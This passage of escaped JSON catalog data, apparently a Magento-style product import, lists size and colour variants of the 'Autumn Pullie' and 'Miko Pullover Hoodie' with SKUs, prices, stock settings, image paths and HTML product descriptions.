\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1026\":{\"sku\":\"WH03-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-XL-Green\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1027\":{\"sku\":\"WH03-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-XL-Purple\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1028\":{\"sku\":\"WH03-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-XL-Red\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1029\":{\"sku\":\"WH03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Pullover|Sweatshirt,material=Fleece|Cotton|Polyester,pattern=Solid,climate=Indoor|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH03-XS-Green,size=XS,color=Green|sku=WH03-XS-Purple,size=XS,color=Purple|sku=WH03-XS-Red,size=XS,color=Red|sku=WH03-S-Green,size=S,color=Green|sku=WH03-S-Purple,size=S,color=Purple|sku=WH03-S-Red,size=S,color=Red|sku=WH03-M-Green,size=M,color=Green|sku=WH03-M-Purple,size=M,color=Purple|sku=WH03-M-Red,size=M,color=Red|sku=WH03-L-Green,size=L,color=Green|sku=WH03-L-Purple,size=L,color=Purple|sku=WH03-L-Red,size=L,color=Red|sku=WH03-XL-Green,size=XL,color=Green|sku=WH03-XL-Purple,size=XL,color=Purple|sku=WH03-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Pullover|Sweatshirt\",\"material\":\"Fleece|Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1030\":{\"sku\":\"WH04-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-XS-Blue\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1031\":{\"sku\":\"WH04-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-XS-Orange\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1032\":{\"sku\":\"WH04-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-XS-Purple\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1033\":{\"sku\":\"WH04-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-S-Blue\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1034\":{\"sku\":\"WH04-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-S-Orange\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 